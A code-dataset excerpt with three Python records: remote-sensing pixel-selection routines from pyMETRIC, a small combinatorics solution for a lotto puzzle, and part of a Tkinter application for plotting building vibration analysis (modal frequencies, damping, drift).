Step 4. Rank the pixel candidates\n print('Ranking candidate anchor pixels')\n lst_rank = rank_array(lst_array)\n vi_rank = rank_array(vi_array)\n rank = vi_rank - lst_rank\n cold_pixel = np.logical_and(cold_pixels, rank == np.max(rank[cold_pixels]))\n\n cold_pixel = tuple(np.argwhere(cold_pixel)[0])\n print('Cold pixel found with %s K and %s VI'%(float(lst_array[cold_pixel]), \n float(vi_array[cold_pixel])))\n \n \n rank = lst_rank - vi_rank\n hot_pixel = np.logical_and(hot_pixels, rank == np.max(rank[hot_pixels]))\n\n hot_pixel = tuple(np.argwhere(hot_pixel)[0])\n print('Hot pixel found with %s K and %s VI'%(float(lst_array[hot_pixel]), \n float(vi_array[hot_pixel])))\n \n return cold_pixel, hot_pixel\n\n\ndef histogram_fiter(vi_array, lst_array):\n cold_bin_pixels = 0\n hot_bin_pixels = 0\n bare_bin_pixels = 0\n full_bin_pixels = 0\n \n while (cold_bin_pixels < 50 \n or hot_bin_pixels <50 \n or bare_bin_pixels < 50\n or full_bin_pixels < 50):\n\n max_lst = np.amax(lst_array)\n min_lst = np.amin(lst_array)\n max_vi = np.amax(vi_array)\n min_vi = np.amin(vi_array)\n \n print('Setting LST boundaries %s - %s'%(min_lst, max_lst))\n n_bins = int(np.ceil((max_lst - min_lst) / 0.25))\n lst_hist, lst_edges = np.histogram(lst_array, n_bins)\n \n print('Setting VI boundaries %s - %s'%(min_vi, max_vi))\n n_bins = int(np.ceil((max_vi - min_vi) / 0.01))\n vi_hist, vi_edges = np.histogram(vi_array, n_bins)\n\n # Get number of elements in the minimum and maximum bin\n cold_bin_pixels = lst_hist[0]\n hot_bin_pixels = lst_hist[-1]\n bare_bin_pixels = vi_hist[0]\n full_bin_pixels = vi_hist[-1]\n\n # Remove possible outliers\n if cold_bin_pixels < 50:\n lst_array = lst_array[lst_array >= lst_edges[1]] \n\n if hot_bin_pixels < 50:\n lst_array = lst_array[lst_array <= lst_edges[-2]] \n\n if bare_bin_pixels < 50:\n vi_array = vi_array[vi_array >= vi_edges[1]] \n\n if full_bin_pixels < 50:\n vi_array = vi_array[vi_array <= vi_edges[-2]] \n\n return lst_edges[0], lst_edges[-1], vi_edges[0], vi_edges[-1]\n\ndef rank_array(array):\n \n temp = array.argsort(axis = None) \n ranks = np.arange(np.size(array))[temp.argsort()].reshape(array.shape)\n \n return ranks\n \ndef incremental_search(vi_array, lst_array, mask, is_cold = True):\n step = 0\n if is_cold:\n while True:\n \n for n_lst in range(1, 11 + step):\n for n_vi in range(1, 11 + step):\n print('Searching cold pixels from the %s %% minimum LST and %s %% maximum VI'%(n_lst, n_vi))\n vi_high = np.nanpercentile(vi_array[mask], 100 - n_vi)\n lst_cold = np.nanpercentile(lst_array[mask], n_lst)\n cold_index = np.logical_and.reduce((mask,\n vi_array >= vi_high,\n lst_array <= lst_cold))\n \n if np.sum(cold_index) >= 10:\n return cold_index\n \n # If we reach here is because not enought pixels were found\n # Incresa the range of percentiles\n step += 5\n if step > 90:\n return []\n else:\n while True:\n for n_lst in range(1,11 + step):\n for n_vi in range(1,11 + step):\n print('Searching hot pixels from the %s %% maximum LST and %s %% minimum VI'%(n_lst, n_vi))\n vi_low = np.nanpercentile(vi_array[mask], n_vi)\n lst_hot = np.nanpercentile(lst_array[mask], 100 - n_lst)\n hot_index = np.logical_and.reduce((mask,\n vi_array <= vi_low,\n lst_array >= lst_hot))\n \n if np.sum(hot_index) >= 10:\n return hot_index\n # If we reach here is because not enought pixels were found\n # Incresa the range of percentiles\n step += 5\n if step > 90:\n return []\n\ndef moving_cv_filter(data, window):\n \n ''' window is a 2 element tuple with the moving window dimensions (rows, columns)'''\n kernel = np.ones(window)/np.prod(np.asarray(window))\n mean = convolve2d(data, kernel, mode = 'same', boundary = 'symm')\n \n distance = (data - mean)**2\n \n std = np.sqrt(convolve2d(distance, kernel, mode = 'same', boundary = 'symm'))\n \n cv = std/mean\n \n return cv, mean, std\n\n", "repo_name": "hectornieto/pyMETRIC", "sub_path": "pyMETRIC/endmember_search.py", "file_name": "endmember_search.py", "file_ext": "py", "file_size_in_byte": 13488, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 20, "dataset": "github-code", "pt": "61", "api": [{"api_name": "numpy.isnan", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.all", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.nanpercentile", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.nanmin", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.argwhere", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.nanmax", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.argwhere", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 79, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 80, "usage_type": "call"}, {"api_name": "numpy.all", "line_number": 81, "usage_type": "call"}, {"api_name": "numpy.nanpercentile", "line_number": 89, "usage_type": "call"}, {"api_name": "numpy.nanpercentile", "line_number": 93, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 95, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 100, "usage_type": "call"}, {"api_name": "numpy.logical_and.reduce", "line_number": 101, "usage_type": "call"}, {"api_name": "numpy.logical_and", "line_number": 101, "usage_type": "attribute"}, {"api_name": "numpy.abs", "line_number": 102, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 103, "usage_type": "call"}, {"api_name": "numpy.logical_and", "line_number": 106, "usage_type": "call"}, {"api_name": "numpy.nanmin", "line_number": 107, "usage_type": "call"}, {"api_name": "numpy.argwhere", "line_number": 109, "usage_type": "call"}, {"api_name": "numpy.nanpercentile", "line_number": 117, "usage_type": "call"}, {"api_name": "numpy.nanpercentile", "line_number": 121, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 123, "usage_type": "call"}, {"api_name": "numpy.logical_and", "line_number": 130, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 131, "usage_type": "call"}, {"api_name": "numpy.logical_and", "line_number": 133, "usage_type": "call"}, {"api_name": "numpy.nanmin", "line_number": 134, "usage_type": "call"}, {"api_name": "numpy.argwhere", "line_number": 136, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 187, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 188, "usage_type": "call"}, {"api_name": "numpy.all", "line_number": 189, "usage_type": "call"}, {"api_name": "numpy.logical_and.reduce", "line_number": 195, "usage_type": "call"}, {"api_name": "numpy.logical_and", "line_number": 195, "usage_type": "attribute"}, {"api_name": "numpy.sum", "line_number": 199, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 200, "usage_type": "call"}, {"api_name": "numpy.logical_and.reduce", "line_number": 208, "usage_type": "call"}, {"api_name": "numpy.logical_and", "line_number": 208, "usage_type": "attribute"}, {"api_name": "numpy.sum", "line_number": 214, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 215, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 221, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 222, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 228, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 229, "usage_type": "call"}, {"api_name": "numpy.logical_and", "line_number": 238, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 238, "usage_type": "call"}, {"api_name": "numpy.argwhere", "line_number": 240, "usage_type": "call"}, {"api_name": "numpy.logical_and", "line_number": 246, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 246, "usage_type": "call"}, {"api_name": "numpy.argwhere", "line_number": 248, "usage_type": "call"}, {"api_name": "numpy.amax", "line_number": 266, "usage_type": "call"}, {"api_name": "numpy.amin", "line_number": 267, "usage_type": "call"}, {"api_name": "numpy.amax", "line_number": 268, "usage_type": "call"}, {"api_name": "numpy.amin", "line_number": 269, "usage_type": "call"}, {"api_name": "numpy.ceil", "line_number": 272, "usage_type": "call"}, {"api_name": "numpy.histogram", "line_number": 273, "usage_type": "call"}, {"api_name": "numpy.ceil", "line_number": 276, "usage_type": "call"}, {"api_name": "numpy.histogram", "line_number": 277, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 303, "usage_type": "call"}, {"api_name": "numpy.size", "line_number": 303, "usage_type": "call"}, {"api_name": "numpy.nanpercentile", "line_number": 315, "usage_type": "call"}, {"api_name": "numpy.nanpercentile", "line_number": 316, "usage_type": "call"}, {"api_name": "numpy.logical_and.reduce", "line_number": 317, "usage_type": "call"}, {"api_name": "numpy.logical_and", "line_number": 317, "usage_type": "attribute"}, {"api_name": "numpy.sum", "line_number": 321, "usage_type": "call"}, {"api_name": "numpy.nanpercentile", "line_number": 334, "usage_type": "call"}, {"api_name": "numpy.nanpercentile", "line_number": 335, "usage_type": "call"}, {"api_name": "numpy.logical_and.reduce", "line_number": 336, "usage_type": "call"}, {"api_name": "numpy.logical_and", "line_number": 336, "usage_type": "attribute"}, {"api_name": "numpy.sum", "line_number": 340, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 351, "usage_type": "call"}, {"api_name": "numpy.prod", "line_number": 351, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 351, "usage_type": "call"}, {"api_name": "scipy.signal.convolve2d", "line_number": 352, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 356, "usage_type": "call"}, {"api_name": "scipy.signal.convolve2d", "line_number": 356, "usage_type": "call"}]} +{"seq_id": "16403126564", "text": "from typing import List\n\n\ndef r(datas: List[int], lst: List[int], index: int):\n\n if 6 == len(lst):\n print(*lst)\n return\n\n if index == len(datas):\n return\n\n r(datas, lst+[datas[index], ], index+1)\n r(datas, lst, index+1)\n\n\nwhile True:\n line = input()\n if line == \"0\":\n break\n\n datas = list(map(int, line.split()[1:]))\n\n r(datas, [], 0)\n\n print()\n", "repo_name": "studiers/BOJ", "sub_path": "06603-lotto.py", "file_name": "06603-lotto.py", "file_ext": "py", "file_size_in_byte": 400, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "typing.List", "line_number": 4, "usage_type": "name"}]} +{"seq_id": "34086863764", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Jun 12 13:27:59 2022\r\n\r\n@author: PC\r\n\"\"\"\r\n\r\nfrom tkinter import *\r\nimport tkinter as tk\r\nfrom tkinter import ttk\r\nfrom tkinter import filedialog\r\nfrom matplotlib.backends.backend_tkagg import FigureCanvasTkAgg\r\nimport matplotlib.pyplot as plt\r\nimport os\r\nfrom tkinter import messagebox\r\nimport pandas as pd\r\nfrom PIL import Image, ImageTk\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\nimport zipfile\r\nimport shutil\r\nfrom Libraries import read_V2,read_version_V2,calcFdd,half_power,log_damp,calc_Drift,calc_modeshape,modeshape_interpolate,draw_maxmodeshape,draw_minmodeshape\r\nimport numpy as np\r\nimport datetime\r\n\r\np1_file = os.path.dirname(os.path.realpath(__file__))\r\n\r\n\r\nclass resultsPage(tk.Toplevel):\r\n \r\n def __init__(self, main):\r\n \r\n super().__init__()\r\n \r\n self.geometry('1050x800')\r\n self.title(\"Results\")\r\n self.resizable(True,True)\r\n \r\n self.mod_df = pd.read_excel(p1_file + \"/Calculation/Event.xlsx\",sheet_name=\"mods\")\r\n self.half_df = pd.read_excel(p1_file + \"/Calculation/Event.xlsx\",sheet_name=\"damp_half\")\r\n self.log_df = pd.read_excel(p1_file + \"/Calculation/Event.xlsx\",sheet_name=\"damp_log\")\r\n \r\n mods_fq = [x for x in self.mod_df]\r\n \r\n self.event_names = mods_fq[0]\r\n mods_fq = mods_fq[1::]\r\n \r\n mf_frame = Frame(self, relief=RIDGE, borderwidth=4)\r\n mf_frame.grid(row=0,column=0)\r\n \r\n mod_label = Label(mf_frame,text=\"Modal Frequencies - Events\",font=(\"Arial\",12,\"underline\",\"bold\"))\r\n mod_label.pack()\r\n \r\n self.mod_mq = ttk.Combobox(mf_frame,width=15,height=3,state=\"readonly\",justify=\"center\")\r\n self.mod_mq[\"values\"] = mods_fq\r\n self.mod_mq.pack()\r\n \r\n self.mf_figure = plt.Figure(figsize=(13,7),dpi=60,tight_layout=True)\r\n self.mf = self.mf_figure.add_subplot(111)\r\n \r\n self.mf.set_xlabel(\"Events\")\r\n self.mf.set_ylabel(\"Modal Frequencies\")\r\n self.chart_type = FigureCanvasTkAgg(self.mf_figure,mf_frame)\r\n self.chart_type.get_tk_widget().pack(padx=10,pady=5)\r\n \r\n\r\n dp_frame = Frame(self, relief=RIDGE, borderwidth=4)\r\n dp_frame.grid(row=1,column=0)\r\n \r\n dp_label = Label(dp_frame,text=\"Half Power - Events\",font=(\"Arial\",12,\"underline\",\"bold\"))\r\n dp_label.pack()\r\n \r\n self.mod_dr = ttk.Combobox(dp_frame,width=15,height=3,state=\"readonly\",justify=\"center\")\r\n self.mod_dr[\"values\"] = mods_fq\r\n self.mod_dr.pack()\r\n \r\n self.dp_figure = plt.Figure(figsize=(13,7),dpi=60,tight_layout=True)\r\n self.dp = self.dp_figure.add_subplot(111)\r\n \r\n self.dp.set_xlabel(\"Damping Ratios\")\r\n self.dp.set_ylabel(\"Events\")\r\n self.chart_type2 = FigureCanvasTkAgg(self.dp_figure,dp_frame)\r\n self.chart_type2.get_tk_widget().pack(padx=10,pady=5)\r\n\r\n\r\n lr_frame = Frame(self, relief=RIDGE, borderwidth=4)\r\n lr_frame.grid(row=1,column=1)\r\n \r\n lr_label = Label(lr_frame,text=\"Logarithmic - Events\",font=(\"Arial\",12,\"underline\",\"bold\"))\r\n lr_label.pack()\r\n \r\n self.mod_lr = ttk.Combobox(lr_frame,width=15,height=3,state=\"readonly\",justify=\"center\")\r\n self.mod_lr[\"values\"] = mods_fq\r\n self.mod_lr.pack()\r\n \r\n self.lr_figure = plt.Figure(figsize=(13,7),dpi=60,tight_layout=True)\r\n self.lr = self.lr_figure.add_subplot(111)\r\n \r\n self.lr.set_xlabel(\"Damping Ratios\")\r\n self.lr.set_ylabel(\"Events\")\r\n self.chart_type3 = FigureCanvasTkAgg(self.lr_figure,lr_frame)\r\n self.chart_type3.get_tk_widget().pack(padx=10,pady=5)\r\n \r\n \r\n dr_frame = Frame(self, relief=RIDGE, borderwidth=4)\r\n dr_frame.grid(row=0,column=1)\r\n \r\n dr_label = Label(dr_frame,text=\"Drift - Events\",font=(\"Arial\",12,\"underline\",\"bold\"))\r\n dr_label.pack()\r\n \r\n \r\n self.dr_figure = plt.Figure(figsize=(13,7),dpi=60)\r\n self.dr = self.dr_figure.add_subplot(111)\r\n \r\n self.dr.set_xlabel(\"Events\")\r\n self.dr.set_ylabel(\"Drift Ratios\")\r\n self.chart_type4 = FigureCanvasTkAgg(self.dr_figure,dr_frame)\r\n self.chart_type4.get_tk_widget().pack(padx=10,pady=5)\r\n \r\n self.mod_mq.bind('<>', self.showMF)\r\n self.mod_dr.bind('<>', self.showDR)\r\n self.mod_lr.bind('<>', self.showLR)\r\n \r\n def showMF(self,event):\r\n \r\n mod = self.mod_mq.get()\r\n \r\n\r\n labels = [x for x in self.mod_df[self.event_names]]\r\n labels.sort()\r\n self.mod_df[\"Events\"] = pd.to_datetime(self.mod_df.Events)\r\n self.mod_df = self.mod_df.sort_values(by=\"Events\")\r\n self.mod_df[self.event_names] = labels\r\n \r\n ranges = range(0,len(labels),1)\r\n \r\n self.mf.clear()\r\n self.mf.set_xlabel(\"Events\")\r\n self.mf.set_ylabel(\"Modal Frequencies\")\r\n self.mf.plot(self.mod_df[self.event_names],self.mod_df[mod],lw=1,linestyle = \"dashed\", marker = '>', ms= '20', mec= 'r')\r\n self.mf.set_xticks(ranges,labels,rotation=45,fontsize=10)\r\n \r\n self.chart_type.draw()\r\n \r\n \r\n def showDR(self,event):\r\n \r\n mod = self.mod_dr.get()\r\n labels = [x for x in self.mod_df[self.event_names]]\r\n labels.sort()\r\n self.mod_df[\"Events\"] = pd.to_datetime(self.mod_df.Events)\r\n self.mod_df = self.mod_df.sort_values(by=\"Events\")\r\n self.mod_df[self.event_names] = labels\r\n ranges = range(0,len(labels),1)\r\n \r\n self.dp.clear()\r\n self.dp.set_xlabel(\"Events\")\r\n self.dp.set_ylabel(\"Damping Ratios\")\r\n self.dp.plot(self.half_df[self.event_names],self.half_df[mod],lw=1,linestyle = \"dashed\", marker = '>', ms= '20', mec= 'r',mfc='orange')\r\n self.dp.set_xticks(ranges,labels,rotation=45,fontsize=10)\r\n \r\n self.chart_type2.draw()\r\n \r\n def showLR(self,event):\r\n \r\n mod = self.mod_lr.get()\r\n labels = [x for x in self.mod_df[self.event_names]]\r\n labels.sort()\r\n self.mod_df[\"Events\"] = pd.to_datetime(self.mod_df.Events)\r\n self.mod_df = self.mod_df.sort_values(by=\"Events\")\r\n self.mod_df[self.event_names] = labels\r\n ranges = range(0,len(labels),1)\r\n \r\n self.lr.clear()\r\n self.lr.set_xlabel(\"Events\")\r\n self.lr.set_ylabel(\"Damping Ratios\")\r\n self.lr.plot(self.log_df[self.event_names],self.log_df[mod],lw=1,linestyle = \"dashed\", marker = '>', ms= '20', mec= 'r',mfc='green')\r\n self.lr.set_xticks(ranges,labels,rotation=45,fontsize=10)\r\n \r\n self.chart_type3.draw() \r\n \r\n\r\nclass showAnalysiss(tk.Toplevel):\r\n \r\n def __init__(self, main,data_df,fs_df,coordinate_df):\r\n \r\n super().__init__()\r\n \r\n self.data_df = data_df\r\n self.fs_df = fs_df\r\n self.coordinate_df = coordinate_df\r\n \r\n self.coordinate_df = pd.read_excel(\"sensors_df.xlsx\")\r\n \r\n self.geometry('1400x900')\r\n self.title(\"Accelerations\")\r\n self.resizable(True,True)\r\n \r\n fdd_frame = Frame(self, relief=RIDGE, borderwidth=4)\r\n\r\n fdd_frame.pack(side=LEFT,anchor=\"nw\")\r\n \r\n self.windows_value = DoubleVar()\r\n self.overlap_value = DoubleVar()\r\n \r\n \r\n label_fdd = Label(fdd_frame,text=\"FDD Graph\",font=(\"Arial\",12,\"underline\",\"bold\"))\r\n label_fdd.pack(anchor=\"w\")\r\n \r\n self.windowing = ttk.Combobox(fdd_frame,width=15,height=3,state=\"readonly\",justify=\"center\",textvariable=self.windows_value)\r\n self.windowing[\"value\"] = [256,512,1024,2048,4096,8192,16348]\r\n self.overlap = ttk.Combobox(fdd_frame,width=15,height=3,state=\"readonly\",justify=\"center\",textvariable=self.overlap_value)\r\n self.overlap[\"value\"] = [0.33,0.66,1.0]\r\n \r\n label_fdd = Label(fdd_frame,text=\"Windowing\",font=(\"Arial\",10))\r\n label_fdd.pack(anchor=\"w\")\r\n \r\n self.windowing.pack(anchor=\"w\")\r\n \r\n label_fdd = Label(fdd_frame,text=\"Overlap\",font=(\"Arial\",10))\r\n label_fdd.place(x=240,y=23)\r\n \r\n calc_button = Button(fdd_frame,text=\"Calculate FDD\",command=self.calc_FDD,bg=\"cyan\")\r\n \r\n self.overlap.place(x=210,y=45)\r\n calc_button.place(x=380,y=40)\r\n \r\n self.fdd_figure = plt.Figure(figsize=(7,7),dpi=70)\r\n self.fd = self.fdd_figure.add_subplot(111)\r\n \r\n self.fd.set_xlabel(\"Frequency (Hz)\")\r\n self.fd.set_ylabel(\"r'dB $[g^2/Hz]$'\")\r\n self.chart_type = FigureCanvasTkAgg(self.fdd_figure,fdd_frame)\r\n self.chart_type.get_tk_widget().pack(anchor=\"n\",side=RIGHT,pady=5)\r\n \r\n table_frame = Frame(self, relief=RIDGE, borderwidth=4)\r\n\r\n table_frame.pack(side=LEFT,anchor=\"n\")\r\n \r\n table_label = Label(table_frame,text=\"Mod Table\",font=(\"Arial\",12,\"underline\",\"bold\"))\r\n table_label.pack()\r\n self.ttv_mod = ttk.Treeview(table_frame)\r\n self.ttv_mod.bind(\"\", self.OnDoubleClick)\r\n self.ttv_mod.pack()\r\n \r\n self.x_figure = plt.Figure(figsize=(4,4),dpi=70)\r\n self.ax = self.x_figure.gca(projection='3d')\r\n \r\n self.chart_type4 = FigureCanvasTkAgg(self.x_figure,table_frame)\r\n self.chart_type4.get_tk_widget().pack(padx=10,pady=5,side=LEFT,anchor=\"w\")\r\n \r\n \r\n self.y_figure = plt.Figure(figsize=(4,4),dpi=70)\r\n self.ay = self.y_figure.gca(projection='3d')\r\n \r\n \r\n self.chart_type5 = FigureCanvasTkAgg(self.y_figure,table_frame)\r\n self.chart_type5.get_tk_widget().pack(padx=10,pady=5,side=RIGHT)\r\n \r\n \r\n aa = Label(self,text=\"Drift Table\",font=(\"Arial\",12,\"underline\",\"bold\"))\r\n aa.place(x=10,y=580)\r\n \r\n columns = [\"Floors\",\"X-Relative Disp.\",\"X-Drift\",\"Y-Relative Disp\",\"Y-Drift\"]\r\n self.ttv_drift = ttk.Treeview(self,columns=columns, show='headings')\r\n \r\n self.ttv_drift.heading('Floors', text='Floors')\r\n self.ttv_drift.heading('X-Relative Disp.', text='X-Relative Disp.')\r\n self.ttv_drift.heading('X-Drift', text='X-Drift')\r\n self.ttv_drift.heading('Y-Relative Disp', text='Y-Relative Disp')\r\n self.ttv_drift.heading('Y-Drift', text='Y-Drift')\r\n \r\n\r\n self.ttv_drift.place(x=10,y=610)\r\n \r\n \r\n def OnDoubleClick(self,event):\r\n fs = 1/self.fs_df[\"fs\"][0]\r\n item = self.ttv_mod.identify('item',event.x,event.y)\r\n values = self.ttv_mod.item(item)\r\n modfreq = values[\"values\"][0]\r\n modfreq = float(modfreq)\r\n \r\n lines = self.fd.axvline(x=modfreq, color='red', linestyle='--')\r\n \r\n mod_shapes = calc_modeshape.calcModeShape(self.data_df,[modfreq],fs=fs)\r\n \r\n max_modshape = mod_shapes[0]\r\n min_modshape = mod_shapes[1]\r\n \r\n height = 22.5\r\n z_dim = 9\r\n length = 50\r\n width = 18\r\n ch_names = self.data_df.columns.values\r\n modeshape_interpolate2 = modeshape_interpolate.modeshapeInterpolate(max_modshape,min_modshape,self.coordinate_df,height,z_dim,ch_names)\r\n \r\n X_df_max = modeshape_interpolate2[1]\r\n Y_df_max = modeshape_interpolate2[3]\r\n \r\n # Drawing modshapes\r\n \r\n modeshapefig = draw_maxmodeshape.modeshapeSensorDrawing(self,X_df_max,Y_df_max,length,width,height,z_dim,0)\r\n \r\n X_df_max = modeshape_interpolate2[0]\r\n Y_df_max = modeshape_interpolate2[2]\r\n \r\n modeshapefig = draw_minmodeshape.modeshapeSensorDrawing(self,X_df_max,Y_df_max,length,width,height,z_dim,0)\r\n \r\n self.chart_type.draw()\r\n \r\n lines.remove()\r\n \r\n def calc_FDD(self):\r\n \r\n windowing = float(self.windowing.get())\r\n overlap = float(self.overlap.get())*100\r\n fs = 1/self.fs_df[\"fs\"][0]\r\n self.fd.clear()\r\n fdd = calcFdd.calcFDD(self,self.data_df.values,fs,(fs/2)/windowing,overlap=overlap)\r\n\r\n mod_freqs = []\r\n for modfreq in fdd.values:\r\n \r\n for freq in modfreq:\r\n mod_freqs.append(float(freq))\r\n \r\n mod_freqs = list(set(mod_freqs))\r\n mod_freqs = mod_freqs[0:6]\r\n mod_freqs.sort()\r\n \r\n data = self.data_df\r\n self.mods = mod_freqs\r\n columns = self.data_df.columns\r\n \r\n windowing = int(windowing)\r\n # # Damping Ratios\r\n self.damp_half = half_power.dampHalf(data,self.mods,fs=fs,samples=windowing,overlap=overlap/100)\r\n self.damp_log = log_damp.dampLog(data,self.mods,fs=fs,samples=windowing,overlap=overlap/100,length=2000)\r\n \r\n self.modfreq_df = pd.DataFrame()\r\n \r\n damp_col = self.damp_half.columns.values\r\n \r\n for i in range(len(damp_col)):\r\n \r\n self.modfreq_df[damp_col[i]] = [self.mods[i]]\r\n \r\n indexes = self.damp_half.index\r\n columns = self.damp_half.columns\r\n \r\n\r\n trans_df = self.modfreq_df.T\r\n indexes = self.damp_half.index\r\n columns = self.damp_half.columns\r\n # self.modfreq_df = self.modfreq_df.rename(columns={0: \"Mod Freq\"})\r\n \r\n # self.damp_half = self.damp_half.T\r\n # self.damp_half = self.damp_half.rename(columns={0: \"Half-Power\"})\r\n\r\n # self.damp_log = self.damp_log.T\r\n # self.damp_log = self.damp_log.rename(columns={0: \"Log-Decrement\"})\r\n \r\n # print(self.modfreq_df)\r\n \r\n\r\n \r\n result_df = pd.DataFrame(data=[self.modfreq_df.iloc[0].values,self.damp_half.iloc[0].values,self.damp_log.iloc[0].values]\r\n ,index=[\"Mod Freq\",\"Half-Power\",\"Log-Decrement\"],columns=columns)\r\n \r\n result_df = result_df.T\r\n \r\n result_df = result_df.round(3)\r\n col = list(result_df.columns)\r\n self.ttv_mod[\"columns\"]=(col)\r\n \r\n for i in self.ttv_mod.get_children():\r\n self.ttv_mod.delete(i)\r\n \r\n for x in col:\r\n self.ttv_mod.column(x,width=20)\r\n self.ttv_mod.heading(x, text=x)\r\n \r\n result_df = result_df.sort_index()\r\n for index, row in result_df.iterrows():\r\n \r\n self.ttv_mod.insert(\"\",0,text=index,values=list(row))\r\n \r\n self.chart_type.draw()\r\n \r\n height = 22.5\r\n z_dim = 9\r\n drift = calc_Drift.calcDrift(self.data_df, self.coordinate_df, fs, height, z_dim)\r\n \r\n X_rel = drift[0].values\r\n Y_rel = drift[1].values\r\n X_Drift = drift[2].values\r\n Y_Drift = drift[3].values\r\n\r\n \r\n \r\n floors = drift[0].index\r\n for i in range(len(floors)):\r\n\r\n self.ttv_drift.insert('', tk.END, values=(floors[i],round(X_rel[i],2),round(X_Drift[0][i],2),round(Y_rel[i],2),round(Y_Drift[0][i],2)))\r\n \r\n \r\n \r\nclass showAccData(tk.Toplevel):\r\n \r\n def __init__(self, main,station_net,data_file,data_df,fs,time,fs_df,coordinate_df):\r\n \r\n super().__init__()\r\n \r\n self.geometry('1100x400')\r\n self.title(\"Accelerations\")\r\n self.resizable(False,False)\r\n \r\n self.data_df = data_df\r\n self.fs = fs\r\n self.fs_df = fs_df\r\n self.time = time\r\n self.coordinate_df = coordinate_df\r\n \r\n # List X\r\n self.x_list = []\r\n self.y_list = []\r\n self.z_list = []\r\n self.n_list = []\r\n self.direc_list = []\r\n \r\n self.station_net = station_net\r\n self.data_file = data_file\r\n \r\n data_label = Label(self,text=\"Data Files\")\r\n data_label.pack(anchor=\"nw\",padx=5)\r\n \r\n data_folder = p1_file + \"/Data\"\r\n data_files = os.listdir(data_folder)\r\n \r\n self.data_combobox = ttk.Combobox(self,width=12,state=\"readonly\",justify=\"center\", postcommand = self.updateList)\r\n self.data_combobox[\"values\"] = data_files\r\n self.data_combobox.pack(anchor=\"nw\",padx=5,pady=5)\r\n \r\n self.Lb1 = Listbox(self)\r\n self.Lb1.pack(side=LEFT,anchor=\"nw\",padx=5,pady=10)\r\n \r\n show_data = Button(self,text=\"Show Value\",bg=\"#66CDAA\",width=15,command=self.showData)\r\n show_data.place(x=10,y=240)\r\n \r\n channel_frame = Frame(self, relief=RIDGE, borderwidth=4)\r\n channel_frame.place(x=150,y=23)\r\n \r\n channel_name = Label(channel_frame,text=\"Channel Name\",font=(\"Arial\",12,\"bold\"))\r\n channel_name.pack()\r\n \r\n self.channel_name = ttk.Combobox(channel_frame,width=15,height=3,state=\"readonly\",justify=\"center\")\r\n self.channel_name.pack(pady=5)\r\n \r\n \r\n self.x_figure = plt.Figure(figsize=(6,4),dpi=70)\r\n self.ax = self.x_figure.add_subplot(111)\r\n \r\n self.ax.set_xlabel(\"Time (s)\")\r\n self.ax.set_ylabel(\"Acceleration (cm/s)\")\r\n self.chart_type = FigureCanvasTkAgg(self.x_figure,channel_frame)\r\n self.chart_type.get_tk_widget().pack(padx=10,pady=5)\r\n \r\n sensor_frame = Frame(self, relief=RIDGE, borderwidth=4)\r\n sensor_frame.place(x=610,y=23)\r\n \r\n channel_name = Label(sensor_frame,text=\"Sensor Placement\",font=(\"Arial\",12,\"bold\"))\r\n channel_name.pack()\r\n \r\n \r\n X_name = Label(sensor_frame,text=\"X\",font=(\"Arial\",10))\r\n X_name.pack()\r\n \r\n self.X_direction = Entry(sensor_frame,justify=\"center\")\r\n self.X_direction.pack(pady=5)\r\n \r\n X_name = Label(sensor_frame,text=\"Y\",font=(\"Arial\",10))\r\n X_name.pack()\r\n \r\n self.Y_direction = Entry(sensor_frame,justify=\"center\")\r\n self.Y_direction.pack(pady=5)\r\n \r\n X_name = Label(sensor_frame,text=\"Z\",font=(\"Arial\",10))\r\n X_name.pack()\r\n \r\n self.Z_direction = Entry(sensor_frame,justify=\"center\")\r\n self.Z_direction.pack(pady=5)\r\n \r\n X_name = Label(sensor_frame,text=\"Direction\",font=(\"Arial\",10))\r\n X_name.pack()\r\n \r\n self.direction = ttk.Combobox(sensor_frame,width=15,height=3,state=\"readonly\",justify=\"center\")\r\n self.direction[\"values\"] = [\"X\",\"Y\",\"Z\"]\r\n self.direction.pack(pady=5)\r\n \r\n place = Button(sensor_frame,text=\"Place Sensor\",command=self.placeSensor)\r\n place.pack(pady=5)\r\n \r\n model_frame = Frame(self, relief=RIDGE, borderwidth=4)\r\n model_frame.place(x=790,y=23)\r\n \r\n channel_name = Label(model_frame,text=\"Model\",font=(\"Arial\",12,\"bold\"))\r\n channel_name.pack()\r\n \r\n\r\n self.model = plt.Figure(figsize=(4,4),dpi=70)\r\n self.ad = self.model.gca(projection='3d')\r\n \r\n height = 22.5\r\n width = 18\r\n length = 50\r\n \r\n center = [length/2 , width/2, height/2]\r\n \r\n ox, oy, oz = center\r\n l, w, h = [length,width,height]\r\n \r\n x = np.linspace(ox-l/2,ox+l/2,num=3) \r\n y = np.linspace(oy-w/2,oy+w/2,num=3)\r\n z = 